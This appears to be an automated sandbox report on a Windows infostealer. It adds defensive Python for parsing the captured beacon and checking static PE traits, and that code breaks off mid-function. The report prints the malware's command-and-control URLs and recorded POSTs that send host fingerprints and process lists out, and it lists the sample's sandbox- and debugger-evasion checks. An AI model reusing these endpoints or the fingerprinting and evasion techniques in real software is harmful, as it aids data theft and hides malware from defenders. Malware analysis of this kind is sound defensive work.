

Windows Analysis Report
wlEp68Few5.exe

Overview

General Information

Sample name: wlEp68Few5.exe (renamed because the original name is a hash value)
Original sample name: 8cd346fc831e7d59ebab0de045018b84.exe
Analysis ID: 1578070
MD5: 8cd346fc831e7d59ebab0de045018b84
SHA1: 65ecbe74b5e512c9b00dbb0d041ac1f812f3cbb5
SHA256: ca2b0a34c077e6e81cde2626da1aca4de3f52190747d4f66636a0a8397e158c5
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wlEp68Few5.exe (PID: 5960 cmdline: "C:\Users\user\Desktop\wlEp68Few5.exe" MD5: 8CD346FC831E7D59EBAB0DE045018B84)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched



AV Detection

Source: wlEp68Few5.exe  Avira: detected
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=  Avira URL Cloud: Label: malware
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963  Avira URL Cloud: Label: malware
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1  Avira URL Cloud: Label: malware
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF  Avira URL Cloud: Label: malware
Source: wlEp68Few5.exe  Virustotal: Detection: 47%
Source: wlEp68Few5.exe  ReversingLabs: Detection: 44%
Source: Submitted Sample  Integrated Neural Analysis Model: Matched 100.0% probability
Source: wlEp68Few5.exe  Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: -----BEGIN PUBLIC KEY-----  0_2_0049DCF0
Source: wlEp68Few5.exe  Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: mov dword ptr [ebp+04h], 424D53FFh  0_2_004DA5B0
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: mov dword ptr [ebx+04h], 424D53FFh  0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: mov dword ptr [edi+04h], 424D53FFh  0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: mov dword ptr [esi+04h], 424D53FFh  0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: mov dword ptr [edi+04h], 424D53FFh  0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: mov dword ptr [esi+04h], 424D53FFh  0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: mov dword ptr [ebx+04h], 424D53FFh  0_2_004DA7F0
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: mov dword ptr [ebx+04h], 424D53FFh  0_2_004DB560
(The immediate 424D53FFh stored little-endian is the byte sequence FF 53 4D 42, i.e. "\xFFSMB", the protocol identifier that begins every SMB1 header; this constant is what the "create an SMB header" signature keys on.)
Source: wlEp68Few5.exe  Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_0047255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_004729FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: global traffic  HTTP traffic detected: GET /ip HTTP/1.1  Host: httpbin.org  Accept: */*
Source: global traffic  HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1  Host: home.twentytk20pn.top  Accept: */*  Content-Type: application/json  Content-Length: 501502  Data Ascii (decoded from the report's hex dump, which is truncated at this point): { "ip": "8.46.123.189", "current_time": "1734593609", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name
Source: global traffic  HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1  Host: home.twentytk20pn.top  Accept: */*  Content-Type: application/json  Content-Length: 143  Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View  IP Address: 98.85.100.80
Source: Joe Sandbox View  IP Address: 194.87.47.113
Source: unknown  UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 events)
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_0053A8C0 recvfrom
Source: global traffic  HTTP traffic detected: GET /ip HTTP/1.1  Host: httpbin.org  Accept: */*
Source: global traffic  DNS traffic detected: DNS query: httpbin.org
Source: global traffic  DNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknown  HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1  Host: home.twentytk20pn.top  Accept: */*  Content-Type: application/json  Content-Length: 501502  Data Ascii: same truncated fingerprint body as the POST decoded above (the report repeats the capture under a second signature)
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: http://.css
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: http://.jpg
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: wlEp68Few5.exe, 00000000.00000003.1455713408.0000000001788000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp, wlEp68Few5.exe, 00000000.00000003.1455697777.0000000001783000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1460803954.000000000178A000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: wlEp68Few5.exe, 00000000.00000003.1455713408.0000000001788000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455697777.0000000001783000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1460803954.000000000178A000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1
Source: wlEp68Few5.exe, 00000000.00000003.1455713408.0000000001788000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455697777.0000000001783000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1460803954.000000000178A000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963
Source: wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000003.1455516008.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1455056831.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1461182211.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000003.1454984926.00000000017E3000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: http://html4/loose.dtd
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: wlEp68Few5.exe  String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: https://curl.se/docs/hsts.html
Source: wlEp68Few5.exe  String found in binary or memory: https://curl.se/docs/hsts.html#
Source: wlEp68Few5.exe, wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: wlEp68Few5.exe  String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: https://httpbin.org/ip
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown  Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown  Network traffic detected: HTTP traffic on port 49721 -> 443
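The first POST above is the host fingerprint the sample builds before exfiltration (the string table in the evasion section carries the same field names: NUM_PROCESSOR, NUM_RAM, DRIVERS, NUM_DISPLAYS, RESOLUTION_X/Y, RECENT_FILES, PROCESSES, UPTIME_MINUTES, INSTALLED_APPS), and the sandbox cuts the capture off mid-object, so a plain json.loads rejects it. The following Python is an added example, not code from the report or from the malware: it takes the decoded prefix exactly as recovered from the hex dump, backs off to the longest bracket-balanced prefix, parses that, and summarises what was collected, including whether any of the analysis tools the sample itself scans for (names taken from its string table) appear in the exfiltrated process list. What the numeric fields mean beyond their names is not stated anywhere on the page and is left raw.

```python
import json

# Prefix of the 501502-byte POST body, decoded from the report's hex dump; the
# capture (and therefore this string) stops mid-object after the last "{ "name".
CAPTURED_BODY = (
    r'{ "ip": "8.46.123.189", "current_time": "1734593609", "Num_processor": 4, '
    r'"Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], '
    r'"Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, '
    r'"processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, '
    r'{ "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, '
    r'{ "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, '
    r'{ "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, '
    r'{ "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, '
    r'{ "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, '
    r'{ "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, '
    r'{ "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, '
    r'{ "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name'
)

# Process names the sample looks for, as listed in its own string table.
ANALYSIS_TOOLS = {"windbg.exe", "wireshark.exe", "procmon.exe", "x64dbg.exe", "ida.exe"}


def _closers(text):
    """Closing brackets needed to balance text, or None if it ends inside a
    string or has a mismatched bracket (so it cannot be a valid prefix)."""
    stack, in_str, esc = [], False, False
    for ch in text:
        if in_str:
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
        elif ch in "{[":
            stack.append("}" if ch == "{" else "]")
        elif ch in "}]":
            if not stack or stack[-1] != ch:
                return None
            stack.pop()
    return None if in_str else "".join(reversed(stack))


def salvage_json(body):
    """Return (object, truncated). Complete bodies parse directly; a truncated
    body is cut back to the last closed value and the open containers are
    closed, so every element that was fully captured survives."""
    try:
        return json.loads(body), False
    except ValueError:
        pass
    for cut in range(len(body) - 1, 0, -1):
        if body[cut] not in "}]":
            continue
        prefix = body[:cut + 1].rstrip()
        closers = _closers(prefix)
        if closers is None:
            continue
        try:
            return json.loads(prefix + closers), True
        except ValueError:
            continue
    raise ValueError("no parseable prefix")


def summarize(beacon):
    """Flatten the fingerprint into what an analyst records from the capture."""
    procs = [p.get("name", "") for p in beacon.get("processes", [])]
    return {
        "public_ip": beacon.get("ip"),            # result of the earlier GET httpbin.org/ip
        "cpus": beacon.get("Num_processor"),
        "ram": beacon.get("Num_ram"),             # unit not stated in the capture
        "drives": {d["name"]: (d["all"], d["free"]) for d in beacon.get("drivers", [])},
        "display": (beacon.get("Num_displays"), beacon.get("resolution_x"), beacon.get("resolution_y")),
        "recent_files": beacon.get("recent_files"),
        "process_count": len(procs),
        "analysis_tools_visible": sorted(p for p in procs if p.lower() in ANALYSIS_TOOLS),
    }


if __name__ == "__main__":
    beacon, truncated = salvage_json(CAPTURED_BODY)
    print("truncated:", truncated)
    print(summarize(beacon))
```

The process list is the interesting field for a defender: it is the same data the sample checks locally for debuggers and monitors, sent to the operator so the server side can discard sandbox runs. Values such as 4 CPUs, a single 1280x1024 display and 38 recent files are exactly the kind of low-spec profile such filtering keys on, so a detonation environment that is meant to receive a second stage should look less like the one captured here.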

System Summary

Source: wlEp68Few5.exe  Static PE information: section name: (empty)
Source: wlEp68Few5.exe  Static PE information: section name: .idata
Source: wlEp68Few5.exe  Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code functions (51 listed): 0_3_01801DDE, 0_2_004805B0, 0_2_00486FA0, 0_2_004AF100, 0_2_0053B180, 0_2_007FE030, 0_2_005400E0, 0_2_004D6210, 0_2_0053C320, 0_2_007C4410, 0_2_00540420, 0_2_0047E620, 0_2_0053C770, 0_2_007D6730, 0_2_004DA7F0, 0_2_007F4780, 0_2_00484940, 0_2_0047A960, 0_2_0052C900, 0_2_00646AC0, 0_2_0072AAC0, 0_2_00604B60, 0_2_0072AB2C, 0_2_007E8BF0, 0_2_0047CBB0, 0_2_007FCC70, 0_2_007F4D40, 0_2_00630D80, 0_2_007ECD80, 0_2_0078AE30, 0_2_00494F70, 0_2_0053EF90, 0_2_00538F90, 0_2_007C2F90, 0_2_004810E6, 0_2_007DD430, 0_2_007E35B0, 0_2_00801780, 0_2_00529880, 0_2_007C9920, 0_2_007F3A70, 0_2_004B1BE0, 0_2_007E1BD0, 0_2_007D7CC0, 0_2_00729C80, 0_2_00485DB0, 0_2_00483ED0, 0_2_00495EB0, 0_2_007F9FE0, 0_3_01802443, 0_3_018031F6
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 0048CCD0 appears 54 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 0064CBC0 appears 104 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 004775A0 appears 704 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 0048CD40 appears 80 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 00627220 appears 103 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 004B50A0 appears 101 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 004771E0 appears 47 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 0047CAA0 appears 61 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 004B4F40 appears 333 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 004773F0 appears 113 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 004B4FD0 appears 289 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 0047C960 appears 37 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 004B5340 appears 48 times
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: String function: 005544A0 appears 76 times
Source: wlEp68Few5.exe  Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: wlEp68Few5.exe  Static PE information: Section: vwhakcfb ZLIB complexity 0.9944798693086003
Source: wlEp68Few5.exe  Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: classification engine  Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_0047255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_004729FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\wlEp68Few5.exe  File read: C:\Windows\System32\drivers\etc\hosts (3 events)
Source: wlEp68Few5.exe  Virustotal: Detection: 47%
Source: wlEp68Few5.exe  ReversingLabs: Detection: 44%
Source: wlEp68Few5.exe  String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: wlEp68Few5.exe  String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: winmm.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: wldp.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Section loaded: kernel.appcore.dll
Source: wlEp68Few5.exe  Static file information: File size 4474880 > 1048576
Source: wlEp68Few5.exe  Static PE information: Raw size of (unnamed section) is bigger than: 0x100000 < 0x283e00
Source: wlEp68Few5.exe  Static PE information: Raw size of vwhakcfb is bigger than: 0x100000 < 0x1bcc00

Data Obfuscation

Source: C:\Users\user\Desktop\wlEp68Few5.exe  Unpacked PE file: 0.2.wlEp68Few5.exe.470000.0.unpack  (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; vwhakcfb:EW; nubvuqgg:EW; .taggant:EW;  vs  (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; vwhakcfb:EW; nubvuqgg:EW; .taggant:EW;
Source: initial sample  Static PE information: section where entry point is pointing to: .taggant
Source: wlEp68Few5.exe  Static PE information: real checksum: 0x44f6fb should be: 0x454563
Source: wlEp68Few5.exe  Static PE information: section name: (empty)
Source: wlEp68Few5.exe  Static PE information: section name: .idata
Source: wlEp68Few5.exe  Static PE information: section name: (empty)
Source: wlEp68Few5.exe  Static PE information: section name: vwhakcfb
Source: wlEp68Few5.exe  Static PE information: section name: nubvuqgg
Source: wlEp68Few5.exe  Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_3_017EDCD1 push esi; ret  0_3_017EDCD2
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_3_017ECCCB push esp; iretd  0_3_017ECD2A
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_3_017F0038 push eax; ret  0_3_017F0039
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_3_017E9B8D push eax; retf  0_3_017E9B95
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_3_017ECA8B push esp; ret  0_3_017ECCCA
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_007F41D0 push eax; mov dword ptr [esp], edx  0_2_007F41D5
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_004F2340 push eax; mov dword ptr [esp], 00000000h  0_2_004F2343
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_0052C7F0 push eax; mov dword ptr [esp], 00000000h  0_2_0052C743
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_004B0AC0 push eax; mov dword ptr [esp], 00000000h  0_2_004B0AC4
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_004D1430 push eax; mov dword ptr [esp], 00000000h  0_2_004D1433
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_004F39A0 push eax; mov dword ptr [esp], 00000000h  0_2_004F39A3
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_004CDAD0 push eax; mov dword ptr [esp], edx  0_2_004CDAD1
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Code function: 0_2_007F9F40 push dword ptr [eax+04h]; ret  0_2_007F9F6F
Source: wlEp68Few5.exe  Static PE information: section name: vwhakcfb entropy: 7.956697617870847
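Every indicator in this section is a static property of the file: a stored checksum (0x44f6fb) that does not match what the loader algorithm computes (0x454563), an entry point inside .taggant rather than .text, unnamed and randomly named sections, a section with entropy close to 8, and sections mapped both writable and executable. The Python below is an added example, not part of the Joe Sandbox report, that recomputes those indicators using only the standard library. The image it triages is a constructed minimal PE32 that imitates the sample's layout, not the sample itself; the sets of "known" section names and the entropy threshold of 7.0 are the kind of analyst-tuned assumptions such a script carries, not values taken from the report.

```python
import math
import struct

# Section names a normal linker emits; the entry point is expected in a code section.
CODE_SECTIONS = {b".text", b"CODE", b".code", b"INIT"}
KNOWN_SECTIONS = CODE_SECTIONS | {b".data", b".rdata", b".idata", b".edata", b".rsrc",
                                  b".reloc", b".bss", b".tls", b".pdata", b".CRT"}
SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000


def pe_checksum(data, checksum_offset):
    """Image checksum as the Windows loader computes it: sum the file as 32-bit
    words with end-around carry, skip the CheckSum field itself, fold to 16 bits
    and add the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    skip, total = checksum_offset & ~3, 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data):
    """Minimal header walk: entry RVA, stored CheckSum (and its file offset), sections."""
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    checksum_off = opt + 64                      # same offset for PE32 and PE32+
    (stored,) = struct.unpack_from("<I", data, checksum_off)
    sections = []
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                         "raw": data[raw_ptr:raw_ptr + raw_size], "chars": chars})
    return entry_rva, stored, checksum_off, sections


def triage(data):
    """Compute the static indicators the report raises, from the file bytes."""
    entry_rva, stored, checksum_off, sections = parse_pe(data)
    computed = pe_checksum(data, checksum_off)
    entry_name, odd, unprintable, high_entropy, wx = None, [], [], [], []
    for s in sections:
        name = s["name"].decode("latin-1")
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], len(s["raw"])):
            entry_name = name
        if s["name"] not in KNOWN_SECTIONS:
            odd.append(name)
        if not s["name"] or not all(0x21 <= c <= 0x7E for c in s["name"]):
            unprintable.append(name)
        h = shannon_entropy(s["raw"])
        if len(s["raw"]) >= 512 and h > 7.0:      # packed or encrypted payload
            high_entropy.append((name, round(h, 3)))
        if s["chars"] & SCN_EXECUTE and s["chars"] & SCN_WRITE:
            wx.append(name)
    return {
        "stored_checksum": stored, "computed_checksum": computed,
        # 0 is normal for unsigned builds; a non-zero value that disagrees with
        # the file means the image was modified after the linker wrote it.
        "checksum_mismatch": stored != 0 and stored != computed,
        "entry_section": entry_name,
        "entry_outside_standard": entry_name is None or entry_name.encode() not in CODE_SECTIONS,
        "non_standard_names": odd, "unprintable_names": unprintable,
        "high_entropy": high_entropy, "writable_executable": wx,
    }


def build_pe(sections, entry_rva, stored_checksum=0):
    """Constructed minimal PE32 image for this example (not the analysed sample).
    sections: list of (name, rva, raw_bytes, characteristics)."""
    file_align, e_lfanew = 0x200, 0x40
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
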